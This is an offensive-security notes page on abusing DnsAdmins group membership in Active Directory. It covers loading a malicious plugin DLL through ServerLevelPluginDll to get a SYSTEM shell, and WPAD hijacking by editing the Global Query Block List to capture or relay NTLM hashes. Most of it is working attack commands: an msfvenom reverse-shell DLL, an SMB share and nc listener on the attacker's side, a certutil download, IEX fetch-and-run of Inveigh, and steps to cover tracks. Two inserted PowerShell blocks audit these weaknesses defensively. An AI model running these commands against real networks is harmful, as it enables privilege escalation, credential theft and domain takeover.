PRIMARY CATEGORY → WINDOWS PRIVESC   •   SECURITY GROUPS

Theory

This group is primarily intended for DNS management in AD environments

A domain user account which belongs to this group can manage DNS zones, DNS records and DNS configuration of the given nameserver, which is usually a DC

Moreover, it is closely tied to the DNS Server role in AD as this group is created during the feature installation


Enumeration

Listing the Groups to which the Current User belongs
whoami /groups
net user <USER>
Members of DNS Admins
net localgroup "DnsAdmins"

Code Execution as LOCAL SYSTEM

We must bear in mind that Windows DNS service supports custom plugins and can call functions from them to resolve some name queries

Since this service runs as LOCAL SYSTEM, we could use the dnscmd command line utility to load a malicious plugin DLL by specifying a remote path controlled by the attacker

Therefore, an operator could craft a DLL which executes a reverse shell when the DNS service is restarted

That is, we leverage the ServerLevelPluginDll registry value to load an arbitrary DLL; as stated, once the DNS service is restarted, the given DLL will be loaded as LOCAL SYSTEM
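From the defender's side, the same registry value is the thing to audit. The following check is an added example (not part of the original notes); it assumes it runs on the DNS server (usually a DC) with rights to read HKLM, the ActiveDirectory module, and a SACL on the Parameters key if the 4657 search is to return anything.

```powershell
# Added defensive check, not from the original notes. Assumes: run on the DNS server
# with rights to read HKLM, ActiveDirectory module available, SACL set for event 4657.
$ParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsServerPluginDll {
    param([string]$Path = $ParamsKey)
    # ServerLevelPluginDll is absent or empty on a healthy server; any value deserves a ticket
    $props = Get-ItemProperty -Path $Path -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    $value = $props.ServerLevelPluginDll
    if ([string]::IsNullOrWhiteSpace($value)) {
        return [pscustomobject]@{ Configured = $false; Path = $null; Risk = 'None' }
    }
    $isUnc  = $value -match '^\\\\'          # remote DLL, fetched and loaded by dns.exe as SYSTEM
    $exists = Test-Path -LiteralPath $value -ErrorAction SilentlyContinue
    $signed = $false
    if ($exists -and -not $isUnc) {
        $signed = (Get-AuthenticodeSignature -FilePath $value).Status -eq 'Valid'
    }
    $risk = if ($isUnc -or -not $signed) { 'High' } else { 'Review' }
    [pscustomobject]@{ Configured = $true; Path = $value; IsUnc = $isUnc; Exists = $exists; Signed = $signed; Risk = $risk }
}

function Get-DnsAdminsMembers {
    # Every direct or nested member can set ServerLevelPluginDll via dnscmd; keep this list short
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object objectClass, SamAccountName, distinguishedName
}

function Get-DnsPluginValueChanges {
    # Security event 4657 = "A registry value was modified"; filter it to this one value
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4657 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Services\\DNS\\Parameters' -and $_.Message -match 'ServerLevelPluginDll' } |
        Select-Object TimeCreated, Message
}

Test-DnsServerPluginDll
Get-DnsAdminsMembers
Get-DnsPluginValueChanges
```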

That said, we can proceed as follows →

Generating a Malicious DLL

From the attacker ⚔️

MSFVenom
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --arch x64 --platform windows --format dll --out <MALICIOUS_DLL>.dll
Mimilib.dll (see References)

Making the DLL accessible from the target

See alternatives

Setting up an SMB Server

From the attacker ⚔️

smbserver.py -smb2support -user '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'
Modifying the DNS Service Configuration

From the target 🎯

Then, we need to modify the ServerLevelPluginDll registry value related to the DNS service configuration

To do so, we can either use the dnscmd utility or edit the registry directly

DNSCmd.exe
dnscmd.exe /config /serverlevelplugindll "\\<ATTACKER_IP>\<SHARE>\<MALICIOUS_DLL>"
Editing the Windows Registry directly

CMD & PS → Reg Add

reg add "HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /t REG_SZ /d "\\<ATTACKER_IP>\<SHARE>\<MALICIOUS_DLL>" /f

PS → Set-ItemProperty

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' -Name 'ServerLevelPluginDll' -Value '\\<ATTACKER_IP>\<SHARE>\<MALICIOUS_DLL>' -Type String -Force
Setting up a TCP Listener

From the attacker ⚔️

rlwrap -CaR nc -nlvp <TCP_PORT>
Restarting the DNS Service

From the target 🎯

In order to load the DLL, it’s required to restart the DNS service. We may be able to restart the DNS service since we are members of the DNS Admins group

Regardless of this, we should check which permissions the current user has over the DNS service object by retrieving the existing ACEs within the DACL of its security descriptor

Retrieving the Current User SID

To do so, first we need to know which SID the current user has

cmd.exe /c wmic useraccount where "name='%USERNAME%'" get sid
Checking Permission on DNS Service

Reference

Once we know the SID of the current user, we can leverage the sc.exe sdshow command to retrieve the security descriptor of the given service object and look for an ACE granting that SID the right to start and stop it

sc.exe sdshow DNS
Restarting the DNS Service

With the appropriate permissions, we can restart the service as follows

sc.exe stop DNS
sc.exe start DNS
Alternatives

If it does not work and we do not receive the reverse shell, simply transfer the DLL to the target and specify the local path of the DLL instead of a remote UNC path

  • Transferring the DLL to the target

From the attacker ⚔️

python -m http.server 80

From the target 🎯

mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f "http://<ATTACKER_IP>/<MALICIOUS_DLL>"
  • Modifying the ServerLevelPluginDll key to load the malicious DLL

From the target 🎯

dnscmd.exe /config /serverlevelplugindll "C:\Windows\Temp\LPE\<MALICIOUS_DLL>"

Then return to Setting up a TCP Listener

Cleaning up

Once we receive a shell as LOCAL SYSTEM and can carry out any action as that account, we should perform certain cleanup actions to cover our tracks and ensure that the DNS service starts correctly, i.e. without loading any malicious DLL which can affect the service availability

Retrieving the value of ServerLevelPluginDll

So first, we must validate the current contents of the value before deleting it

CMD & PS → Reg Query

reg query "HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll

PS → Get-ItemProperty

(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters').ServerLevelPluginDll
Deleting Registry Key

CMD & PS → Reg Delete

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /f

PS → Remove-ItemProperty

Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' -Name 'ServerLevelPluginDll' -Force
Restarting the DNS service again
sc.exe stop DNS
sc.exe start DNS

WPAD Abuse

Workflow

To prevent WPAD spoofing, Microsoft introduced the Global Query Block List starting with Windows Server 2008, which causes the DNS server to respond with an NXDOMAIN indicating that the queried name does not exist, even if a record for it really exists

However, the situation changes when an operator compromises a domain user account which belongs to the DNS Admins built-in group

Since any member of this group has the ability to enable, disable or edit the Global Query Block List, the entry for WPAD can be removed from this list

Immediately afterward, the operator can create a new DNS record in the DNS zone named WPAD.domain.internal pointing to the attacker’s IP Address

Once this is done, any victim that has the Automatically detect settings proxy option enabled, which is the default, will be subject to the following →

  • A certain web client within its system (e.g. IE) will try to automatically detect any valid proxy configuration

  • It will send a query name asking for the resolution of WPAD.domain.internal to the Primary DNS Server, which is typically the DC on a domain-joined machine

  • The DC will respond with the attacker IP Address as the adversary has created the WPAD.domain.internal DNS record previously

  • Then it will send an HTTP request to the attacker’s HTTP server requesting a wpad.dat resource, which is a JavaScript PAC file that contains a proxy configuration

  • The HTTP server responds with a 401 Unauthorized error and a WWW-Authenticate HTTP header asking for some type of authentication to the client

  • Lastly, the victim’s web client sends an authentication to the attacker, who leverages it to capture Net-NTLMv2 hashes or relay the authentication to another node
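A defender can verify every link in that chain from the DNS server itself: block list enabled, wpad still in it, no wpad A record in the zone, and NXDOMAIN for wpad.<zone> as seen by clients. The following audit and repair functions are an added example (not from the original notes); they assume the DnsServer module (RSAT) and rights to query and edit the server, with <DC_FQDN> and <DOMAIN> as placeholders.

```powershell
# Added defensive check, not from the original notes. Assumes the DnsServer module
# and rights to query/edit the DNS server; <DC_FQDN> and <DOMAIN> are placeholders.
function Test-WpadProtection {
    param(
        [Parameter(Mandatory)] [string]$DnsServer,   # e.g. <DC_FQDN>
        [Parameter(Mandatory)] [string]$Zone         # e.g. <DOMAIN>
    )
    $gqbl        = Get-DnsServerGlobalQueryBlockList -ComputerName $DnsServer
    $blockListOn = [bool]$gqbl.Enable
    $wpadBlocked = $gqbl.List -contains 'wpad'
    # Any wpad record in the zone is suspicious unless a real WPAD host is sanctioned
    $wpadRecord = Get-DnsServerResourceRecord -ComputerName $DnsServer -ZoneName $Zone `
                      -Name 'wpad' -RRType A -ErrorAction SilentlyContinue
    # What clients actually see: a healthy server answers NXDOMAIN for wpad.<zone>
    $answer = Resolve-DnsName -Name "wpad.$Zone" -Server $DnsServer -Type A -ErrorAction SilentlyContinue
    $findings = @()
    if (-not $blockListOn) { $findings += 'Global Query Block List is disabled' }
    if (-not $wpadBlocked) { $findings += 'wpad is missing from the Global Query Block List' }
    if ($wpadRecord)       { $findings += "wpad A record present: $($wpadRecord.RecordData.IPv4Address)" }
    if ($answer)           { $findings += "wpad.$Zone resolves to $($answer.IPAddress -join ',')" }
    [pscustomobject]@{
        Server = $DnsServer; Zone = $Zone; BlockListEnabled = $blockListOn
        WpadInBlockList = $wpadBlocked; WpadRecordExists = [bool]$wpadRecord
        Healthy = ($findings.Count -eq 0); Findings = $findings
    }
}

function Repair-WpadProtection {
    param([Parameter(Mandatory)] [string]$DnsServer, [Parameter(Mandatory)] [string]$Zone)
    # Restore the default block list (wpad and isatap), re-enable it and drop any wpad A record
    Set-DnsServerGlobalQueryBlockList -ComputerName $DnsServer -Enable $true -List 'wpad','isatap'
    Get-DnsServerResourceRecord -ComputerName $DnsServer -ZoneName $Zone -Name 'wpad' -RRType A -ErrorAction SilentlyContinue |
        Remove-DnsServerResourceRecord -ComputerName $DnsServer -ZoneName $Zone -Force
}

Test-WpadProtection -DnsServer '<DC_FQDN>' -Zone '<DOMAIN>'
```

Run Test-WpadProtection on a schedule and alert on Healthy = $false; Repair-WpadProtection is the one-shot fix once the change has been confirmed as unauthorised.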

Requirements

That said, in order to be able to carry out this technique, the following requirements must be met

  • Controlled domain user account belonging to the DNS ADMINS group
  • Attacker machine in the same network as the AD environment
Abuse - Windows
Verifying Group Membership
whoami /groups | findstr /I "DNS"
Disabling or Deleting the WPAD entry from the Global Query Block List
  • Disable

CMD & PS → dnscmd.exe

dnscmd.exe "<DC_FQDN>" /config /enableglobalqueryblocklist 0

PS → Set-DnsServerGlobalQueryBlocklist

Set-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>' -Enable $false
  • WPAD Entry Deletion

PS → Set-DnsServerGlobalQueryBlocklist

Set-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>' -List 'isatap'   # the cmdlet replaces the whole list (default: wpad, isatap); this keeps isatap and drops wpad
Checking the status of the Global Query Block List

PS → Get-DnsServerGlobalQueryBlocklist

Get-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>'
Creating the WPAD DNS Record in the Domain DNS Zone

CMD & PS → dnscmd.exe

dnscmd.exe "<DC_FQDN>" /recordadd "<DOMAIN>" wpad A "<ATTACKER_IP>"

PS → Add-DnsServerResourceRecordA

Add-DnsServerResourceRecordA -ComputerName '<DC_FQDN>' -ZoneName '<DOMAIN>' -Name 'wpad' -IPv4Address '<ATTACKER_IP>'
Checking the WPAD DNS Record

CMD & PS → nslookup

nslookup wpad.domain.internal <DC_FQDN>

PS → Resolve-DNSName

Resolve-DnsName -Name wpad.domain.internal -Server <DC_FQDN>
Setting up the HTTP Server via a Responder Tool

Inveigh

  • Setup

Fileless

IEX (New-Object Net.WebClient).downloadString('https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1' -OutFile '.\Inveigh.ps1'
Import-Module .\Inveigh.ps1
  • Usage
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTP Y -WPAD Y
Intercepting Authentications

Once we receive incoming authentications through HTTP, simply proceed as follows →


Cleanup - Windows
Deleting the WPAD DNS Record

CMD & PS → dnscmd.exe

dnscmd.exe "<DC_FQDN>" /recorddelete "<DOMAIN>" wpad A "<ATTACKER_IP>" /f

PS → Remove-DnsServerResourceRecord

Remove-DnsServerResourceRecord -ComputerName '<DC_FQDN>' -ZoneName '<DOMAIN>' -Name 'wpad' -RRType A -Force
Reactivating the Global Query Block List

CMD & PS → dnscmd.exe

dnscmd.exe "<DC_FQDN>" /config /enableglobalqueryblocklist 1

PS → Set-DnsServerGlobalQueryBlocklist

Set-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>' -Enable $true

References

ADSecurity: From DNSAdmins to Domain Admin